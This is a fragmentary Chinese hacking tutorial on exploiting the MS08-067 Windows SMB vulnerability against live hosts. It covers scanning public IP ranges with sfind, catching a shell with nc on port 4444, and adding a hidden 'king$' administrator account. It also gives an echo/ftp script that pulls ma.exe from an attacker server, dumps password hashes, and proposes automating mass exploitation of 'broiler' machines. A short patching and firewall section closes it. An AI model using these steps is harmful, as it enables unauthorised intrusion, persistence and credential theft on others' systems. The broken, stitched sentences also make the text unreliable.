就笔者个人经验来说,现在的Linux(一)MS08067服务RPC在 Microsoft Windows 2000系统上,攻击者可能未经身份验证即可利用此漏洞运行任意代码,此漏洞可用于进行蠕虫攻击,目前已经有利用该漏洞的蠕虫病毒。防火墙最佳做法和标准的默认防火墙配置有助于保护网络资源免受从企业外部发起的攻击,默认情况下能建立空连接。
MS08-067(二)MS08067端口
、445下面扫描的工具,一个是sfind.exe地址1 ip,例如扫描“sfind –p 445 218.99.0.1 218.99.0.255”,两个小软件扫描完成后自动保存结果,可以在肉鸡后台上进行工作,扫描完成后上去看结果即可。我采用sfind.exe所示,一共出来7使用sfind说明:
扫描目录下直接打开sfind.txt溢出工具对结果进行溢出尝试
”,然后打开DOS程序,无任何反应,唉,晕!),直接输入程序名称,即可出现具体的使用方式,MS08067地址为存在该漏洞的服务器或者个人计算机的IP,结果显示为“SMB Connect OK! Maybe Patched!图2 (1(2(3监听“4444在执行扫描的计算机上使用nc地址 4444”可能已经安装补丁、防火墙禁止对外进行连接等情况,导致溢出不成功。
中可以定制监听端口,不过那个端口需要在源程序中定制。
4.地址执行溢出,重新监听该IP串口,终于看到了希望,我在本地虚拟机上执行了多次测试,都未成功,但在实际环境中却测试成功。
查看服务器信息
所示,该服务器为Windows 2003查看服务器版本等信息
6.所示使用“net user king$ nohacker /add”命令添加“king$”用户加入到管理员组中。
上传文件
服务器,然后使用以下样本下载ma.exe:
echo open 218.*.*.* >b
echo ftp>>b
echo ftp>>b
echo bin>>b
echo get ma.exe>>b
echo bye>>b
ftp -s:b
del b
服务器上下载,然后可以在反弹的Shell“运行”,在其中输入“\\IP\admin$所示,如图能够连接,则会出现一个输入网络密码的提示框,在用户和密码中分别输入刚才添加的用户名。
如果验证正确,则可以像使用资源管理器一样使用被溢出计算机所建立的磁盘连接,如图7,
.获取系统详细信息以及执行各种命令
地址 4444所示,偶使用telnet图8 说明:
连接被溢出计算机不如反弹shell(2(3登录被溢出服务器
地址、刚才添加的用户名和密码,验证成功后,顺利进入服务器,如图9顺利进入被溢出服务器
10.所示,就地取材,看看系统有什么杀毒软件,有无360扫描系统漏洞并修复
)如果系统安装有瑞星等杀毒软件,使用getpw
密码。Getpw
密码一定要在shell
文件中,并去除内容中的空格,正确的格式如图11
获取的密码Hash
)如果被溢出服务器已经开放3389
值
值的好处就是以后使用管理员的帐号和密码进行登录,当然还可以以防万一!
12.、Window 2000 Server均可成功溢出,如图12
(三)防范措施
1.首先就是升级系统补丁,推荐使用360卫士,但是其版本太低,未及时更新补丁程序,失去了应有的防范能力。
2.,因此推荐在系统中安装防火墙,对内外网防范都有效。
漏洞的本地测试,一个都没有成功,都想放弃了,后面打算放到实际环境中进行测试,未想一炮打响,再后来有一些改进的思路,偶做了录像,具体可以看录像,本人觉得可以将其修改跟1433自动抓肉鸡那个工具一样,自动扫描,自动溢出,自动执行下载程序,安全总在思维的突破!